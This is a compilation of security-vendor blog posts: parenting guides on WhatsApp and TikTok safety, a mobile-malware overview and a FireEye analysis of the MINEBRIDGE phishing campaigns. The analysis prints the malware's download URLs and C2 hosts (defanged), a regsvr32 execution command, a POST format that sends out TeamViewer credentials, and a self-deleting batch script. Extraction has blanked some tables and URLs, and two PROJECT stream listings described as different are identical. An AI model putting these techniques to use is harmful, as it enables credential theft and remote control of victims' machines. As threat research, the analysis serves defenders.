You can’t miss the bright green WhatsApp icon on your child’s phone or in the desktop application folder. ©WhatsApp

It has cool features. WhatsApp has a broadcast feature that allows a user to send out a message to a group of people that can then only respond to the sender. The Status Feature enables users to send disappearing photos, videos, and GIFs, much like the fun features on Instagram and Snapchat.

WhatsApp hacks keep it fun. Kids love workarounds and cool functionality hacks they can use to enhance their WhatsApp experience. WhatsApp hacks can be found online with a quick Google search. Hacks help users understand how to do fun things such as schedule messages, create fake conversations, retrieve deleted messages, turn off Read receipts, make a Broadcast List, and formatting hacks that will help their account stand out.

There’s a perception of secrecy/security. WhatsApp has end-to-end encryption built-in, which means any texts, photos, or videos exchanged between users are encrypted (scrambled code) and assumed to be secure between the people communicating. WhatsApp has set itself apart from other chat apps in this area. No server stores messages after they are delivered. Not even WhatsApp can read, view, or listen to the chats, which gives users a sense of privacy and security. However, as we are reminded daily, WhatsApp, like every app is vulnerable to hacks, scams, and breaches.

What are the risks?

Inappropriate, secretive content. As with any app, the biggest concern is in the way kids and others use the app. WhatsApp (like any messaging app) allows anyone to create an account. Kids can be exposed to inappropriate content and exchange inappropriate content with others. As with any app, kids will also use acronyms or slang to hide risky behavior.

Strangers. A lot of people use WhatsApp, including those with harmful intentions. Users may assume group chats are closed to strangers since group members need a digital link to join. However, group chat links can be copied by group members and shared with anyone who can then click and join without any vetting.

Cyberbullying. Group texts are a big reason kids use WhatsApp. They can have groups as large as 250 kids. So, if a rumor, mean comment is shared or conflict erupts, situations can get intense very quickly and easily spill beyond the WhatsApp environment.

Privacy. While kids believe WhatsApp safely encrypt conversations, it does not protect them from people taking and sharing screenshots. Private discussions and photos can also be downloaded. Another threat to privacy is the way the app itself collects data of its users, which can be reviewed in its Privacy Policy and User Data section.

Scams and malware. WhatsApp is not immune to the typical scams that target social apps. The Facebook-owned app has had issues with spyware, catfishing, phishing, money requests, and fraudulent job opportunities — all in a quest to get users to hand over their personal information or assets.

Fake news. Because WhatsApp allows a user to chat in a group of up to 250 people, it’s easy for information to go viral quickly, even that information isn’t accurate. More recently, fake news originated on WhatsApp that incited panic around Coronavirus conspiracies and the 2018 mob killing in India.

Family Safety Tips

WhatsApp web
The WhatsApp interface. ©WhatsApp

Download and discuss the app. WhatsApp is easy to download and understand (simple texting interface). Once you know the basics, discuss the pros and cons of WhatsApp with your child. Ask your child to walk you through his or her app to show you how they use it.

Some questions to consider asking might be:

What do you like most about WhatsApp?
What kind of group chats are you a part of?
What kind of media do you mostly receive and send?
Are there any people in your group chats you don’t know?
Are your location and account settings as secure as they can be?
Have you shared personal information or your phone number?
Has any situation made you feel uncomfortable while on the app?

Guide younger users. For younger children or new WhatsApp users (age requirement is 13), consider creating a private WhatsApp group just for your family. Teach your kids to create a safe profile, maximize safety features, block strangers, report bullying, and how to safely share pictures, videos, and communicate. Use this time, teach them the upside of the app and the risks.

Monitor devices, screen time, and behavior. There are a lot of issues to consider and pay attention to when your kids use messaging apps. First, to monitor content, consider security software as well as filtering software. Second, pay attention to screen time and your child’s ability to balance technology use. Third, monitor behavior. Messaging apps connect kids to groupthink, a variety of content, and several emotional danger zones. Technology monitoring includes paying particular attention to your child’s emotional and physical health, friend groups, academic performance, and sleep habits.

Talk about privacy settings. Encourage your child to maximize settings and use the two-step verification option that allows a custom PIN for security against breaches and hacks. Privacy settings will allow users to choose Everyone, My Contacts, and Nobody. Review profile information and omit any personal information (age, phone number, other account links, school name, hometown).

Control location sharing. When location sharing is turned on, the images your child shares on WhatsApp will also show his or her exact location when the photo was taken. Be aware of this and consider keeping location turned off.

Avoid strangers and strange links. Once a person outside of your child’s known circle has his or her phone number, they can send any content directly unless (and until) they are blocked. They can catfish, scam, or groom WhatsApp users. Talk with your child about the importance of only chatting with known, trusted people and to block messages from strangers. Messages from strangers could contain explicit content, malware, spam, or phishing scam.

Should your child be on WhatsApp? As long as your child is only connected to trusted people (and has some form of monitoring), this can be a relatively safe social app that echos the features of most other apps. However, every family and every child is different, and whether or not your child is allowed to use the app is a personal decision. If your child is active on the app with your approval, one way to help them navigate the danger zones is to keep the safety conversation on-going and honest. Your guidance is crucial. You’ve got this parent!

The post Is WhatsApp Safe for Kids? Here’s What Parents Need to Know appeared first on McAfee Blogs.

Is Mobile Malware Playing Hide and Steal on Your Device?

Over the years, we’ve all grown accustomed to using our smartphones and mobile apps to support our lifestyles. We as consumers have developed expectations of how devices can enhance our everyday lives- from online banking transactions to handling work correspondence on the go. But as we become more reliant on our smart devices and apps, hackers use this dependency as an opportunity to gain unwarranted access to our personal data. According to McAfee’s latest Mobile Threat Report, hidden apps are the most active mobile threat facing consumers, generating nearly 50% of all malicious activities in 2019. Let’s dive into these mobile threats and how they could potentially impact your life.

Don’t Let These Mobile Threats Commandeer Your Device


LeifAccess (also known as Shopper) is an Android-based malware distributed through social media, gaming platforms, and fraudulent advertising. Once installed, this stealthy hides its icon and displays fake security notifications, hoping to trick the user into granting the malware accessibility access. LeifAccess/Shopper has also been found to use third-party logins to cheat app ranking systems and wreak more havoc on victims’ devices. The malware uses the accessibility features in Android to quietly create third-party accounts, automatically download apps from Google Play, and post reviews using names and emails configured from the victim’s device.

According to the Mobile Threat Report, hackers are also tricking users into installing adware onto their devices, redirecting them to a variety of fraudulent ads. Because digital ad revenue is simply based on screens displayed and clicks, hackers are quick to exploit this threat so they can collect fraudulent ad revenue at the expense of unsuspecting users. Due to the volume and speed of the redirects, many consumers don’t even realize that their device is infected or that their data is being collected.


HiddenAds masquerades as genuine apps like Call of Duty, Spotify, and FaceApp to trick users into downloading them. But once the app is installed on the victim’s device, the app icon changes to one that mimics the Settings icon. When the victim clicks on it, the app displays a fake error message that reads “Application is unavailable in your country. Click OK to uninstall.” However, clicking OK completes the malicious app installation process and then hides the fake Settings icon, making it nearly impossible to find and delete the malware.


McAfee researchers also discovered a new targeted attack hidden in a legitimate South Korean transit app. Called MalBus, this new attack method exploits the app developer’s hacked Google Play account. Once the hackers accessed the developer’s account, they added an additional library to the apps and uploaded them to Google Play. Now, MalBus spyware can phish for   with a local webpage that mimics the real Google login screen. Additionally, MalBus can drop a malicious trojan on the victim’s device, searching for specific military or political keywords. If these keywords are found, the victim’s matching files are uploaded to a remote server without their knowledge.

How to Stay Protected

As hackers continue to target consumers through the channels they spend the most time on – their mobile devices – it’s important for users to reflect on the current digital landscape to help protect their data, as well as their family and friends. Follow these security tips to defend against stealthy mobile threats:

  • Do your research. While some malicious apps do make it through the app store screening process, the majority of attack downloads appear to be coming from social media, fake ads, and other unofficial app sources. Before downloading an app to your device, do some quick research about the source and developer.
  • Read app reviews with a critical eye. Reviews and rankings are still a good method of determining whether an app is legitimate. However, watch out for reviews that reuse simple or repetitive phrases, as this could be a sign of a fraudulent review.
  • Update, update, update. Developers are actively working to identify and address security issues. Frequently update your operating systems and apps so that they have the latest fixes and security protections.
  • Use a VPN. A virtual private network, or , allows you to send and receive data across a public network, but it encrypts your information so others can’t read it. This can prevent hackers from spying on your internet activity, therefore protecting your privacy.
  • Keep tabs on your accounts. Use ID monitoring tools to be aware of changes or actions that you did not make. These may have been caused by malware and could indicate that your phone or account has been compromised.
  • Defend your devices with security software. Comprehensive security software across all devices continues to be a strong defensive measure to protect your data and privacy from online threats.

To stay updated on all things McAfee and the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Mobile Malware Playing Hide and Steal on Your Device? appeared first on McAfee Blogs.

Is the TikTok App Safe for Kids?

TikTok safety

Everyone’s talking about the TikTok app. In addition to talking, tweens and teens are swiping, laughing, and sharing TikTok videos. Meanwhile, parents are concerned with one thing: Is TikTok safe?

What is TikTok?

Based out of China, TikTok is a video-based social networking app that replaced the app, which ended its digital run in 2017. The app allows users to create an account, make and post short 15-60-second videos, as well as view, comment on, and share videos from other users. According to reports, TikTok has 1 billion active users in 155 countries. Approximately 60 percent of TikTok’s audience is between 16 and 24. Guidelines state that anyone 12+ can use the app, though there’s no age-verification process.

Why Do Kids Love TikTok?

TikTok is the latest and greatest digital hangout that has become the main channel for kids to discover new and creative ways to express themselves. They can follow their interests, be entertained, and be rewarded with views, likes, and shares for their artistic efforts. Tik Tok has built-in editing tools, free music, and dialogue clips, and filters that make creating videos easy for any skill level. Users can share funny sketches, lip-sync videos, and spontaneous, personal raves or rants. According to app reviews posted by teens, TikTok is also a go-to creative outlet, a place to de-stress, and a confidence-builder.

What are the risks?

Apps aren’t inherently risky. Rather, it’s the way individuals use an app that puts themselves or others at risk. That’s why understanding how your kids engage on TikTok, and how to make the experience as safe as possible, is important. Here are some of the risks your child could encounter on TikTok:

Contact from strangers. According to news reports, predators use TikTok to connect with kids. Anyone who follows a TikTok user can privately message them and initiate private conversations outside of the app.

Exposure to mature content and lyrics. Apps attract users of all ages, which means if your child has a TikTok account, he or she has access to the public video feed. With 1 billion users, your child will likely see videos containing sexually suggestive or explicit images and hear explicit lyrics (we saw and heard plenty). They may even unknowingly use music clips for their videos that contain explicit lyrics.

Spam and malware. Recent reports reveal software flaws that could potentially open up TikTok accounts to a range of malicious attacks. Researchers say hackers could have exploited the flaws to send legitimate-looking text messages loaded with malware, made private videos public, and accessed personal data.

Excessive screentime. TikTok is a curiosity magnet for kids, which can lead to excessive screen time, lack of sleep, and a host of other negative outcomes from too much time online.

TikTok safety

Cyberbullying. TikTok users have been known to create “cringe compilations,” which are videos they deem to be odd, uncool, or cringe-worthy. Several of these cruel compilations have been posted outside of TikTok and have gone viral.

Quest for likes. As with any social network, some users can become preoccupied with amassing views, likes, and followers. This obsession can lead to bad decisions, risky behavior (such as challenges), cyberbullying, and sharing harmful content.

Oversharing. Some kids share their daily activities through TikTok videos and inadvertently expose personal information such as their school, their location, home address, and other personal data.

10 Family Safety Tips

Should you allow your child to use TikTok? The answer to that question depends on a few things, including the age of the child using the app and how they use it. Here are a few tips that may help in that decision.

  1. Download the app. The best way to understand TikTok is to download it, create an account, and explore. Take some solo time to search a few hashtags, scroll some feeds, and get a feel for the content. Visit the app’s safety center for an overview of safety tools. Visit the privacy center to see how your child’s data is being used.
  2. Go through the app together. Sit and browse content with your child. Discuss the pros and cons of the content and how it does or doesn’t align with your family’s digital ground rules.
  3. Max privacy settings. By making a TikTok account private, only approved followers (known friends) can view your child’s videos or send your child messages. When an account is public, anyone can comment, send messages, or share your child’s videos.
  4. Explore restricted mode. TikTok has a Restricted Mode for minors that will allow you to filter out inappropriate content.
  5. Explore Family Safety Mode. This TikTok feature allows a parent to link their TikTok account to their child’s to manage screen time, direct messages, set restrictions, and control friend and comment filters.
  6. Control interactions. Users can disable comments on a specific video, block people they don’t know from following them, and report abuse.
  7. Monitor social circles. Kids can change privacy settings and eventually be wooed into making more connections and getting more exposure. Consider monitoring who your child follows and who is following them. Consider the TikTok influencers they follow and the type of content they share.
  8. Monitor screen time. It’s easy to burn through countless hours on TikTok. The app has a digital wellbeing element that alerts users every two hours. Consider filtering software that adds another way to set screen limits.
  9. Talk about being an upstander. Creating and sharing original content online takes courage — and attracts bullies, making TikTok a potentially unsafe environment for kids. Encourage your child to be an upstander online and offer encouragement and support to peers when needed.
  10. Block the app. If you determine TikTok’s content isn’t a good fit for your family or that the risks outweigh the opportunities, both Android and iOS have built-in parental controls in Settings that allow you to block any app (consider rechecking these settings weekly).

One look at today’s headlines, and it’s tempting for a parent to want to delete every app like TikTok. Only we know a similar app will soon surface. Another approach is to jump into the digital mix. Know what apps your kids love and why. Understand how they use their favorite apps and who they are talking to. And, always remember: It’s never too early or too late to start these critical conversations with your kids. You’ve got this, parents!

The post Is the TikTok App Safe for Kids? appeared first on McAfee Blogs.

M-Trends 2020: Insights From the Front Lines

Today we release M-Trends 2020, the 11th edition of our popular annual FireEye Mandiant report. This latest M-Trends contains all of the statistics, trends, case studies and hardening recommendations that readers have come to expect through the years—and more.

One of the most exciting takeaways from this year’s report: the global median dwell time is now 56 days. That means the average attacker is going undetected on a network for under two months—an M-Trends first. This is a very promising statistic that demonstrates how far we’ve come since 2011 when the global median dwell time was 416 days. And yet, we know a sophisticated attacker needs only a few days to gain access to the crown jewels, so there is still plenty of room for improvement.

Another interesting statistic in the report is what we refer to as "detection by source." For the first time since 2015, the majority of organizations are being notified of compromises by external sources (53 percent) over internal teams (47 percent). This is more likely due to factors such as increases in law enforcement notifications and compliance changes, and less likely due to internal teams having lost a step.

There’s a whole lot more to look forward to in M-Trends 2020, including:

  • By the Numbers: Global median dwell time and detection by source are just the tip of the iceberg—we share a number of other statistics related to targeted industries, malware, threat techniques and more.
  • Newly Named APT Groups: Learn all about APT41, group responsible for carrying out Chinese state-sponsored espionage and financially motivated activity since as far back as 2012.
  • Trends: We take a deep dive into the latest trends involving malware families, monetizing ransomware, crimeware as a service, and malicious insiders.
  • Case Studies: With so many organizations moving to the cloud, we take a look at a breach involving cloud assets. We also take readers through a campaign where attackers were targeting gift cards.

While M-Trends 2020 contains plenty of new information, the goal of M-Trends has remained the same since the beginning: to arm security professionals with details on the latest attacks and threats we are seeing during our engagements.

Download the 11th edition of M-Trends today.

Timeless Principles to Help Your Child Develop Social Superpowers

online relationships

“You can make more friends in two months by becoming interested in other people than you can in two years by trying to get other people interested in you.” ~ Dale Carnegie

Each year it’s my tradition to re-read a handful of books that continue to shape my perspective. One of those books is the 1936 self-help classic, How to Win Friends and Influence People by Dale Carnegie.

I’ll admit, I’ve never liked the book’s overly-schmoozy title, but its content is gold. And 84 years later, it’s still relevant to our ongoing family discussion of how to model leadership and get a more meaningful return on our digital connections.

Slow down, look around

It has become easy, and almost habitual, to move fast, skim content, and make quick judgments. We upload details about ourselves, our opinions, our activities, our agendas, our wins.

Carnegie’s approach (condensed and paraphrased): Slow down and look around. Take a genuine interest in the people around you. Make room for different points of view. Steer clear of drama, criticizing others, and conflict. And never make anyone feel “less than.”

Social superpowers

Carnegie’s principles, applied online, are tools parents can use to help kids develop their social superpowers. The simple act of slowing down and listening instead of clicking is a big step toward more genuine connections.

On the safety side, slowing down can help kids become more aware of and avoid threats such as cyberbullying, scams, catfishing, and online conflict.

Here are a few more Carnegie power tips (condensed and paraphrased) to help build up your family’s social superpowers.

More meaningful connections

Take a genuine interest in others. “If we want to make friends, let’s do things for other people – things that require time, energy, unselfishness, and thoughtfulness.”

Encourage your child to step out of the “selfie” mindset as a first step in forming more genuine friendships online (as opposed to amassing followers). Brainstorm ways to do this. Maybe it’s more face-to-face time with known friends, keeping track of other people’s birthdays, and hand-writing cards and sending them in the mail. Paying attention to the details of a person’s life — their hobbies, family members, values, and goals — is the heartbeat of a real friendship.

Smile, be welcoming.  “Actions speak louder than words, and a smile says, ‘I like you. You make me happy. I am glad to see you.’”

Sounds simple but a smile — in this case, the way we welcome others online — can go a long way. The attitude we express through our online interactions communicates can make or break our relationships and reputation.

Encourage your child to review and delete negative or harmful content that lacks a spirit of inclusion and kindness. Our social profiles may be the first impression others — including teachers, colleges, and employers — may have of us.

Another plus: Choosing a digital “smile” when we post (over drama and making fun) sends a powerful message that can ease cyberbullying, build empathy, and be a source of strength for others who may be struggling.

Note: Choosing to smile online as a general principle doesn’t include faking it or only sharing a heavily-edited or overly positive version of your life. Be real. Be honest. Be you.

Affirm others. “. . . a sure way to [people’s] hearts is to let them realize in some subtle way that you realize their importance and recognize it sincerely.”

Everyone person on the planet has a fundamental need to be noticed and feel valued. With the amount of anxiety, depression, body image issues, and cyberbullying kids face online, what young person couldn’t use a genuine word of encouragement?

Discuss the many ways to affirm others on and offline. Encourage your child to be aware and willing to complement the strengths of others, cheer on accomplishments, and support a cause or passion they’ve expressed.

Avoid arguments and criticizing others. “Criticism is dangerous because it wounds a person’s precious pride, hurts his [or her] sense of importance, and arouses resentment.”

If we could all master these two Carnegie principles online, the world’s collective mental health might be on a happier, healthier trajectory.

Encourage your child to pay attention to his or her emotions and avoid engaging others if they feel angry, anxious, or tired. Discuss the importance of empathy and forgiveness. Challenge them to allow others to express their ideas without judgment.

Avoiding conflict doesn’t mean you ignore injustice or become a doormat. On the contrary, responding with grace in a tense situation requires strength and self-control — especially when it comes to trolls and bullies.

Carnegie wrote his book during the Great Depression when the practice optimism and simple truths were critical to a person’s hope. So, some perspectives will feel odd or passé. But stick with it. Savor and apply the gems and enjoy the process of deepening your digital connections.

The post Timeless Principles to Help Your Child Develop Social Superpowers appeared first on McAfee Blogs.

STOMP 2 DIS: Brilliance in the (Visual) Basics

Throughout January 2020, FireEye has continued to observe multiple targeted phishing campaigns designed to download and deploy a backdoor we track as MINEBRIDGE. The campaigns primarily targeted financial services organizations in the United States, though targeting is likely more widespread than those we’ve initially observed in our FireEye product telemetry. At least one campaign targeted South Korean organizations, including a marketing agency.

In these campaigns, the phishing documents appeared to be carefully crafted and leveraged some publicly-documented — but in our experience uncommon and misunderstood — TTPs, likely in an effort to decrease detection of the malicious documents’ macros. The actor also used a self-hosted email marketing solution across multiple campaigns. Notably, the payload delivered in these campaigns leveraged a packer previously affiliated with a commonly-tracked threat actor, an overlap that we will explore later.

This blog post will review the theme of these campaigns and their targets, the adversary’s unique tradecraft, the MINEBRIDGE C++ backdoor, some potential attribution overlaps, and importantly — the threat actor’s love of rap music.

Targeting and Lure Detail

While we first identified MINEBRIDGE samples in December, we observed our first phishing campaigns relating to this activity in early January 2020. Email addresses used to send phishing messages were associated with domains that appear to have been registered specifically for this purpose within a few weeks of the activity — and were thematically consistent with the content of the phishing messages.

Additionally, the actor(s) responsible are likely using a self-hosted email marketing solution called Acelle. Acelle adds extended email headers to messages sent via the platform in the format of X-Acelle-<variable>. The messages observed across campaigns using these TTPs have included a “Customer-Id” value matching “X-Acelle-Customer-Id: 5df38b8fd5b58”. While that field remained consistent across all observed campaigns, individual campaigns also shared overlapping “X-Acelle-Sending-Server_Id” and “X-Acelle-Campaign-Id” values. All of the messages also included a “List-Unsubscribe” header offering a link hosted at suggesting that it is the server hosting the Acelle instance used across these campaigns. The sample table for one campaign below illustrates this data:








1/7/20 16:15

tax return file





1/7/20 15:59

tax return file






tax return file





1/7/20 16:05

tax return file





The URLs requested by the malicious documents and serving the final MINEBRIDGE payloads delivered in each of these campaigns provide additional overlap across campaigns. In all observed cases, the domains used the same bullet-proof hosting service. The URI used to download the final payload was “/team/invest.php” or, in one case, “/team/rumba.php”. Perhaps the most fun overlap, however, was discovered when trying to identify additional artifacts of interest hosted at similar locations. In most cases a GET request to the parent directory of “/team/” on each of the identified domains served up the lyrics to rap group Onyx’s “Bang 2 Dis” masterpiece. We will refrain from sharing the specific verse hosted due to explicit content.

One of the more notable characteristics of this activity was the consistency in themes used for domain registration, lure content, similarities in malicious document macro content, and targeting. Since first seeing these emails, we’ve identified at least 3 distinct campaigns.

Campaign #1: January 7, 2020 – Tax Theme
  • Emails associated with this campaign used the CPA themed domain registered in late November and the subject line “Tax Return File” with IRS related text in the message body.
  • The attached payload was crafted to look like an H&R Block related tax form.
  • Observed targeting included the financial sector exclusively.

Campaign #2: January 8, 2020 – Marketing Theme
  • Emails associated with this campaign used the same CPA themed domain along with, also registered late November.
  • The subject line and message body offered a marketing partnership opportunity to the victim.
  • The attached payload used a generic theme enticing users to enable macro content.
  • Observed targeting focused on a South Korean marketing agency.

Campaign #3: January 28, 2020 – Recruiting Theme
  • Emails associated with this campaign were sent from several different email addresses, though all used the recruiting-themed domain which was registered on January 20, 2020.
  • The subject line and message body referenced an employment candidate with experience in the financial sector.
  • The attached payload masqueraded as the resume of the same financial services candidate referenced in the phishing email.
  • Observed targeting included the financial sector exclusively.

Quit Stepping All Over My Macros

The phishing documents themselves leverage numerous interesting TTPs including hiding macros from the Office GUI, and VBA stomping.

VBA stomping is a colloquial term applied to the manipulation of Office documents where the source code of a macro is made to mismatch the pseudo-code (hereto referred to as "p-code") of the document. In order to avoid duplicating research and wasting the reader’s time, we will instead reference the impressive work of our predecessors and peers in the industry. As an introduction to the concept, we first recommend reading the tool release blog post for EvilClippy from Outflank. The security team at Walmart has also published incredible research on the methodology. Vesselin Bontchev provides a useful open source utility for dumping the p-code from an Office document in pcodedmp. This tool can be leveraged to inspect the p-code of a document separate from its VBA source. It was adopted by the wider open source analysis toolkit oletools in order to detect the presence of stomping via comparison of p-code mnemonics vs keyword extraction in VBA source.

That is a whole lot of quality reading for those interested. For the sake of brevity, the most important result of VBA stomping as relevant to this blog post is the following:

  • Static analysis tools focusing on VBA macro source extraction may be fooled into a benign assessment of a document bearing malicious p-code.
  • When VBA source is removed, and a document is opened in a version of Office for which the p-code was not compiled to execute, a macro will not execute correctly, resulting in potential failed dynamic analysis.
  • When a document is opened under a version of Office that uses a VBA version that does not match the version of Office used to create the document, VBA source code is recompiled back into p-code.
  • When a document is opened in Office and the GUI is used to view the macro, the embedded p-code is decompiled to be viewed.

The final two points identify some interesting complications in regard to leveraging this methodology more broadly. Versioning complexities arise that toolkits like EvilClippy leverage Office version enumeration features to address. An actor’s VBA stomped document containing benign VBA source but evil p-code must know the version of Office to build the p-code for, or their sample will not detonate properly. Additionally, if an actor sends a stomped document, and a user or researcher opens the macro in the Office editor, they will see malicious code.

Our actor addressed the latter point of this complication by leveraging what we assess to be another feature of the EvilClippy utility, wherein viewing the macro source is made inaccessible to a user within Office by modifying the PROJECT stream of the document. Let’s highlight this below using a publicly available sample we attribute to our actors (SHA256: 18698c5a6ff96d21e7ca634a608f01a414ef6fbbd7c1b3bf0f2085c85374516e):

Document PROJECT stream:

[Host Extender Info]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z

The above PROJECT stream has been modified. Within the PROJECT stream workspace, a module is referenced. However, there is no module defined. We would expect the unmodified PROJECT stream of this document prior to utilization of a tool to modify it to be as follows:

[Host Extender Info]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z

It is interesting to note that we initially identified this actor only performing this manipulation on their malicious documents—avoiding any versioning complexities--without actually stomping the p-code to mismatch the VBA source. This seems like an odd decision and is possibly indicative of an actor assessing what “works” for their campaigns. The above malicious document is an example of them leveraging both methodologies, as highlighted by this screenshot from the awesome publicly available web service IRIS-H Digital Forensics:

We can see that the documents VBA source is a blank Sub procedure definition. A quick glance at the p-code identifies both network- based indicators and host- based indicators we can use to determine what this sample would do when executed on the proper Office version. When we attempt to open the macro in the GUI editor, Office gets angry:

For analysts looking to identify this methodology holistically, we recommend the following considerations:

  • The GUI hiding functionality results in an altered project stream wherein a module exists, but there is no module, class, or baseclass defined in the stream. This is a potential static detection.
  • While the macro source is no longer present, there are still static strings present in Module1 in this sample which may indicate Windows APIs leveraged. This is a potential static detection.

  • Utilities like the previously mentioned oletools can do all of this detection for you. If you identify false negatives, false positives, or bugs, the open source project maintainers respond to them regularly like the superheroes that they are:

The above methodology creates questions regarding potential efficiency problems for scaling any sizable campaign using it. While tools like EvilClippy provide the means to create difficult to detect malicious documents that can potentially sneak past some dynamic and static detections, their payloads have the additional burden of needing to fingerprint targets to enable successful execution. While actors with sufficient resources and creativity can no doubt account for these requirements, it is relevant to note that detections for these methodologies will likely yield more targeted activity. In fact, tertiary review of samples employing these techniques identified unrelated activity delivering both Cobalt Strike BEACON and POSHC2 payloads.

We recently expanded our internal FireEye threat behavior tree to accommodate these techniques. At the time of publication, the authors were unable to directly map the methods – PROJECT stream manipulation and VBA stomping – to existing techniques in the MITRE ATT&CK Matrix™ for Enterprise. However, our team submitted these as contributions to the ATT&CK knowledge base prior to publication and will make additional data available for ATT&CK Sightings.

Crossing The Bridge of Khazad-dûm: The MINEBRIDGE Infection Chain

Successful detonation of the previously detailed malicious document results in creation of “uCWOncHvBb.dll” via a call to URLDownloadToFileA to the URL hxxps://marendoger[.]com/team/rumba.php. The returned MINEDOOR packed MINEBRIDGE sample is saved in the executing users AppData directory (Eg: C:\Users\username\AppData\Roaming\uCWOncHvBb.dll), and then subsequent execution of the DllRegisterServer export via invocation of “regsvr32.exe /s %AppData%\uCWOncHvBb.dll” occurs:

This will result in a ZIP file being retrieved from the URL hxxps://creatorz123[.]top/~files_tv/~all_files_m.bin using the Windows API URLDownloadToFileW. The ZIP file is written to %TEMP%, unzipped to the newly created directory %AppData%\Windows Media Player, and then deleted:

The ZIP file contains legitimate files required to execute a copy of TeamViewer, listed in the file creation area of the IOC section of this post. When a file named TeamViewer.exe is identified while unzipping, it is renamed to wpvnetwks.exe:

After completing these tasks, uCWOncHvBb.dll moves itself to %AppData%\Windows Media Player\msi.dll. The phishing macro then closes the handle to msi.dll, and calls CreateProcessA on wpvnetwks.exe, which results in the renamed TeamViewer instance side-loading the malicious msi.dll located alongside it. The malware ensures its persistence through reboot by creating a link file at %CISDL_STARTUP%\Windows WMI.lnk, which points to %AppData%\Windows Media Player\wpnetwks.exe, resulting in its launch at user logon.

The end result is a legitimate, though outdated (version 11, compiled on September 17, 2018, at 10:30:12 UTC), TeamViewer instance hijacked by a malicious sideloaded DLL (MINEBRIDGE).

MINEBRIDGE is a 32-bit C++ backdoor designed to be loaded by an older, unpatched instance of the legitimate remote desktop software TeamViewer by DLL load-order hijacking. The backdoor hooks Windows APIs to prevent the victim from seeing the TeamViewer application. By default, MINEBRIDGE conducts command and control (C2) communication via HTTPS POST requests to hard-coded C2 domains. The POST requests contain a GUID derived from the system’s volume serial number, a TeamViewer unique id and password, username, computer name, operating system version, and beacon interval. MINEBRIDGE can also communicate with a C2 server by sending TeamViewer chat messages using a custom window procedure hook. Collectively, the two C2 methods support commands for downloading and executing payloads, downloading arbitrary files, self-deletion and updating, process listing, shutting down and rebooting the system, executing arbitrary shell commands, process elevation, turning on/off TeamViewer's microphone, and gathering system UAC information.

MINEBRIDGE’s default method of communication is sending HTTPS POST requests over TCP port 443. This method of communication is always active; however, the beacon-interval time may be changed via a command. Before sending any C2 beacons, the sample waits to collect the TeamViewer generated unique id (<tv_id>) and password (<tv_pass>) via SetWindowsTextW hooks.

This specific sample continuously sends an HTTP POST request over TCP port 443 with the URI ~f83g7bfiunwjsd1/g4t3_indata.php to each host listed below until a response is received.

  • 123faster[.]top
  • conversia91[.]top
  • fatoftheland[.]top
  • creatorz123[.]top
  • compilator333[.]top

The POST body contains the formatted string uuid=<guid>&id=<tv_id>&pass=<tv_pass>&username=<user_name>&pcname=<comp_name>&osver=<os_version>&timeout=<beacon_interval> where <guid> is a GUID derived from the system's volume serial number and formatted using the format string %06lX-%04lX-%04lX-%06lX. Additionally, the request uses the hard-coded HTTP User-Agent string "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1"

After a response is received, it's processed for commands. A single response may contain multiple commands. For each command executed, the sample sends an HTTPS POST request over TCP port 443 indicating success or failure. The sample responds to the commands below.




Download and execute an executable from a URL provided in the command. File saved to %TEMP%\<32_rand_chars>.exe.


Download a custom XOR-encoded and LZNT1 compressed DLL from a URL provided in the command and save to %TEMP%\<32_rand_chars>. Decode, decompress, and load the DLL in memory and call its entrypoint.


Move sample file to <sample_name>.old and download a new version of itself to <sample_name> where <sample_name> is the name of this sample (i.e., msi.dll). Relaunch the hosting TeamViewer application with command-line argument COM1_. Delete <sample_name>.old.


Relaunch the hosting TeamViewer application with command-line argument COM1_.


Terminate the hosting TeamViewer application.


Create and execute the self-deleting batch script tvdll.cmd to delete all unzipped files as well as the sample file. Terminate the hosting TeamViewer application.


Shutdown the system.


Reboot the system.


Update the C2 beacon-interval time.

After executing all commands in the response, the sample sleeps for the designated C2 beacon-interval time. It repeats the process outlined above to send the next C2 beacon. This behavior repeats indefinitely.

The self-deleting batch script tvdll.cmd contains the following content where <renamed_TeamVeiwer> is the renamed TeamViewer executable (i.e., wpvnetwks.exe) and <sample_name> is the name of this sample (i.e., msi.dll).

@echo off
ping -n 1 -w 5000 > nul
goto nosleep1
ping -n 1 -w 750 > nul
attrib -a -h -s -r %~d0%~p0TeamViewer_Resource_en.dll
del /f /q %~d0%~p0TeamViewer_Resource_en.dll
if exist  "%~d0%~p0TeamViewer_Resource_en.dll" goto redel1
goto nosleep2
ping -n 1 -w 750 > nul
attrib -a -h -s -r %~d0%~p0TeamViewer_StaticRes.dll
del /f /q %~d0%~p0TeamViewer_StaticRes.dll
if exist  "%~d0%~p0TeamViewer_StaticRes.dll" goto redel2
goto nosleep3
ping -n 1 -w 750 > nul
attrib -a -h -s -r %~d0%~p0TeamViewer_Desktop.exe
del /f /q %~d0%~p0TeamViewer_Desktop.exe
if exist  "%~d0%~p0TeamViewer_Desktop.exe" goto redel3
goto nosleep4
ping -n 1 -w 750 > nul
attrib -a -h -s -r %~d0%~p0TeamViewer.ini
del /f /q %~d0%~p0TeamViewer.ini
if exist  "%~d0%~p0TeamViewer.ini" goto redel4
goto nosleep5
ping -n 1 -w 750 > nul
attrib -a -h -s -r %~d0%~p0<sample_name>
del /f /q %~d0%~p0<sample_name>
if exist  "%~d0%~p0<sample_name>" goto redel5
goto nosleep6
ping -n 1 -w 750 > nul
attrib -a -h -s -r %~d0%~p0<renamed_TeamVeiwer>
del /f /q %~d0%~p0<renamed_TeamVeiwer>
if exist  "%~d0%~p0<renamed_TeamViewer>" goto redel6
attrib -a -h -s -r %0
del /f /q %0

Possible Connection to Another Intrusion Set

The identified MINEBRIDGE samples have been packed within a loader we call MINEDOOR. Since Fall 2019, we’ve observed a group publicly tracked as TA505 conducting phishing campaigns that use MINEDOOR to deliver the FRIENDSPEAK backdoor. The combination of MINEDOOR and FRIENDSPEAK has also been publicly discussed using the name Get2.

